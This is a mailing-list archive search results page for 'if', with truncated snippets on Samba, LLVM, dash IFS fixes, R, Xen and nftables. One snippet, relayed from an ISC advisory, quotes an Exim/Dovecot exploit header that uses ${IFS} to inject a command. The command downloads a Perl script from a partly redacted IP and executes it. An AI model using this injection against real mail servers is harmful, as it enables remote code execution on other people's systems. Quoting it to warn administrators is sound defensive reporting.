Displaying 20 results from an estimated 477 matches for "if".
2003 Aug 25
6
PDC + LDAP + W2K-SP4 Domain logon
...equest to *SMBSERVER failed (Called name not present)
NetBIOS over TCP disabled -- no workgroup available
</snip>
*quite strange error since it returns the shares?!
---> going on anyway --->
at client side(w2k):
- login on client with local administrator-account.
- browsing network IFS results in seeing only
the windows-2000 machines in the network and NOT the samba PDC.
- if I attempt to connect to '\\<my samba pdc>' I do get a request
for my login and password. Login works and I can browse shares.
- I use 'net use * /d /yes' to be able to join the d...
2017 Aug 04
4
BranchProbability/BlockFrequency for a chain of ifs
I'm look at some code that does something roughly like this
if (a >= 10 && a < 20) {
// do calculation
} else if (a >= 30 && a < 40) {
// do calculation
} else if (a >= 50 && a < 60) {
// do something
} else if (a >= 70 && a < 80) {
// do something
}
// some other code that got split based on whe...
2019 Jan 25
0
[klibc:update-dash] builtin: Fix handling of trailing IFS white spaces
...commit;h=9c83a988fbbacc54bdf700ffc94c5420beb14909
Author: Herbert Xu <herbert at gondor.apana.org.au>
AuthorDate: Sun, 12 Jun 2016 20:17:48 +0800
Committer: Ben Hutchings <ben at decadent.org.uk>
CommitDate: Fri, 25 Jan 2019 02:57:21 +0000
[klibc] builtin: Fix handling of trailing IFS white spaces
The read built-in does not handle trailing IFS white spaces in
the right way, when there are more fields than variables. Part
of the problem is that this case is handled outside of ifsbreakup.
Harald van Dijk wrote a patch to fix this by moving the magic
into ifsbreakup itself.
Th...
2020 Mar 28
0
[klibc:update-dash] dash: builtin: Fix handling of trailing IFS white spaces
...;h=5d0e205c474c4df839f92663457acc991d867c25
Author: Herbert Xu <herbert at gondor.apana.org.au>
AuthorDate: Sun, 12 Jun 2016 20:17:48 +0800
Committer: Ben Hutchings <ben at decadent.org.uk>
CommitDate: Sat, 28 Mar 2020 21:42:54 +0000
[klibc] dash: builtin: Fix handling of trailing IFS white spaces
[ dash commit 0e4c9599468ab102e6a612439db6df0248410483 ]
The read built-in does not handle trailing IFS white spaces in
the right way, when there are more fields than variables. Part
of the problem is that this case is handled outside of ifsbreakup.
Harald van Dijk wrote a patch t...
2001 Dec 30
1
ifs estimator
Hy all,
I have written a small library that provide a new distribution function
estimator based on IFS (that are essentially fractals).
I would be pleased if any of you can build hte library for Unix-type
machines and Windows implementations with the included makefiles as a
Mac library is already working. As I'm not able to test these platforms
any modification to makefiles is welcome.
I h...
2020 Mar 28
0
[klibc:update-dash] dash: var: Set IFS to fixed value at start time
.../klibc/klibc.git;a=commit;h=6dc1db1bce863f0e0e0abda1b9a58d8cb22863ca
Author: Herbert Xu <herbert at gondor.apana.org.au>
AuthorDate: Sat, 19 May 2018 02:39:43 +0800
Committer: Ben Hutchings <ben at decadent.org.uk>
CommitDate: Sat, 28 Mar 2020 21:42:55 +0000
[klibc] dash: var: Set IFS to fixed value at start time
[ dash commit 6458796c79e643503d14e18c611cfbf68c4a8cce ]
This patch forces the IFS variable to always be set to its default
value, regardless of the environment.
It also removes the long unused IFS_BROKEN code.
Signed-off-by: Herbert Xu <herbert at gondor.apana....
2013 Jun 09
1
from ISC: Exim/Dovecot exploit making the rounds
One of our readers wrote in to let us know that he had received an attempted
Exim/Dovecot exploit attempt against his email server. The exploit partially
looked like this:
From:
x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com
(Obviously edited for your safety, and I didn't post the whole thing.)
This is an exploit against Dovecot that is using the feature "use_shell" against
itself. This feature, unfortunately, is found in...
2019 Jul 25
3
[Bug 1358] New: Error when atomically replacing rules with symbolic variables
https://bugzilla.netfilter.org/show_bug.cgi?id=1358
Bug ID: 1358
Summary: Error when atomically replacing rules with symbolic
variables
Product: nftables
Version: unspecified
Hardware: x86_64
OS: other
Status: NEW
Severity: blocker
Priority: P5
Component: nft
Assignee: pablo at netfilter.org
Reporter: gdouezangrard at gmail.com
Created attachment 567
--> https://bugzilla.netf...
2019 Jan 25
0
[klibc:update-dash] [EXPAND] Split unquoted $@/$* correctly when IFS is set but empty
...f24ffa8f0b9d90e29d6daf77e5349dd3ffe4aec
Author: Herbert Xu <herbert at gondor.apana.org.au>
AuthorDate: Wed, 8 Oct 2014 15:24:23 +0800
Committer: Ben Hutchings <ben at decadent.org.uk>
CommitDate: Fri, 25 Jan 2019 02:57:21 +0000
[klibc] [EXPAND] Split unquoted $@/$* correctly when IFS is set but empty
Currently we do not field-split $@/$* when it isn't quoted and IFS
is set but empty. This is obviously wrong. This patch fixes this.
Signed-off-by: Herbert Xu <herbert at gondor.apana.org.au>
Signed-off-by: Ben Hutchings <ben at decadent.org.uk>
---
usr/dash/...
2020 Mar 28
0
[klibc:update-dash] dash: [EXPAND] Split unquoted $@/$* correctly when IFS is set but empty
...0fe5a997d8bbd5048b229d655e6549ced
Author: Herbert Xu <herbert at gondor.apana.org.au>
AuthorDate: Wed, 8 Oct 2014 15:24:23 +0800
Committer: Ben Hutchings <ben at decadent.org.uk>
CommitDate: Sat, 28 Mar 2020 21:42:54 +0000
[klibc] dash: [EXPAND] Split unquoted $@/$* correctly when IFS is set but empty
[ dash commit 3c06acdac0b1ba0e0acdda513a57ee6e31385dce ]
Currently we do not field-split $@/$* when it isn't quoted and IFS
is set but empty. This is obviously wrong. This patch fixes this.
Signed-off-by: Herbert Xu <herbert at gondor.apana.org.au>
Signed-off-by: Be...
2003 Aug 11
1
Memory-problem?
Hi,
I have a big problem with my R-script. It seems to be a memory problem, but I'm not sure.
My script:
test.window <- function(stat, some arguments){
several ifs and ifs in ifs (if(){...if(){...}})
}
...
for (ii in 1 : length(data)){ ## data is a vector of length 2500
stat <- test.window( some arguments )
## there are 15 arguments including a "big" list (stat), vectors and scalars
plot.points(stat, some other arguments)
}
If...
2006 Jan 10
0
Lots of IFs in /proc/net/dev
I have a domU configured with two virtual ethernet interfaces - one on a
private bridge and one to the outside world.
If I cat /proc/net/dev (or loop round the interfaces using SIOCGIFNAME) there
are loads of them? Should they all be there ?
I''m using the same kernel for dom0 & domU.
Inter-| Receive | Transmit
face |bytes packets errs drop fifo fram...
2011 Jul 29
0
[PATCH node] Add debugging info to dracut plugin
Signed-off-by: Mike Burns <mburns at redhat.com>
---
dracut/ovirt-cleanup.sh | 15 ++++++++++++---
1 files changed, 12 insertions(+), 3 deletions(-)
diff --git a/dracut/ovirt-cleanup.sh b/dracut/ovirt-cleanup.sh
index a6762cf..f800bf2 100755
--- a/dracut/ovirt-cleanup.sh
+++ b/dracut/ovirt-cleanup.sh
@@ -20,24 +20,29 @@ elif getarg reinstall >/dev/null; then
elif getarg uninstall >/dev/null; then
fb=$(getarg uninstall)
else
+ info &...
2006 Feb 07
0
About two IFs with the same IP and the multipath
...the HOWTO: one computer with two
Internet connections.
The problems come when I try to use the same IPs for both A and B.
So A is 10.229.25.8 and B 10.229.25.8.
I cannot do otherwise, I''m forced to use the same IPs.
For the rules which select the sources I''ve tried to use the `iif'' option
instead of the `from'' one.
32764: from all iif tunl1 lookup main 202
32765: from all iif tunl0 lookup main 201
These rules don''t work and this means that the packets choose a different gw
each time and the TCP connections are killed.
I''ve tried also...
2003 Feb 20
0
Netbios name service forwarding.
...ing your subnets and
it listens for netbios nameserver packets and forwards
them. [Broadcast packets are sent on to other nets as
broadcast packets, the unicast replies are returned as
unicast replies] It also sends a copy of any netbios
traffic it sees to the local nmbd which will be running
on a different port.
So I have a machine running samba bridging
eth0 192.168.42.0/24
eth1 192.168.48.0/24
I start nmbd with nmbd -D -p 138
and this program
nbnsfw 138 eth0 eth1
then my windows machines on each side can resolve names
without a WINS server and across multiple workgroups.
take care,
J....
2005 Dec 23
0
[LLVMdev] if's to switch transformation?
...c
> converted to a switch statement and gcc compiled that nicely to a jumptable
> in the .s file. Now I try to reproduce when directly going from a .ll to a .s
> file. But I now see a long list of compare and jumps instead of the
> jumptable. Is there a transformation that does this if->switch(ing) or is
> that in the part of llc that generates the c file?
There is one of two things that are happening depending on what you mean.
1. Make sure you're running gccas/gccld to optimize the program. These
optimizations are what form the switch stmt.
2. If you're us...
2006 Jun 21
3
Time Based Goto Ifs Act Strange?
Hi,
I'm still in the process of debugging this, but I have a gotoif
statement that looks like this:
exten => 26,1,GotoIfTime(7:00-18:00|mon-fri|*|*?ext-queues,210,1)
exten => 26,n,Goto(ext-local,${VM_PREFIX}127,1)
I have others setup the same way that also seem to have the same
'issue'. The issue is that they work, but they seem to require (and I
d...
1999 Dec 09
0
xauth location in openssh-1.2pre17
The current configuration only works if xauth can be
found at /usr/X11R6/bin/xauth, which creates some problems
when running sshd on an openwin system.
Contained below are patches to find the path of xauth in configure,
and set the path in config.h. (also contained is a patch for
configure for those without autoconf)
Also-- added #inc...
2005 Dec 23
2
[LLVMdev] if's to switch transformation?
...at llc -
march=c converted to a switch statement and gcc compiled that nicely
to a jumptable in the .s file. Now I try to reproduce when directly
going from a .ll to a .s file. But I now see a long list of compare
and jumps instead of the jumptable. Is there a transformation that
does this if->switch(ing) or is that in the part of llc that
generates the c file?
cheers
Eric van Riet Paap
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.llvm.org/pipermail/llvm-dev/attachments/20051223/5708a337/attachment.html>
2011 Mar 11
2
Ifs in formula
Dear r-helpers,
This might be an elementary question, but I have a hard time getting
my head around it, so all help is much appreciated.
I am working on a nonlinear regression model of the form
if z > 0
y = f1(x,y),
else
y = f2(x,t) .
In other words, the functional form of f(.) changes according to some
criteria z. Natural approach would be to fit two models, i.e.
model1 <- nlm(y ~ ..., data=data[data$z > 0,]),
model2 <- nlm(y ~ ..., data=data[data$z <= 0,]).
But this is unfe...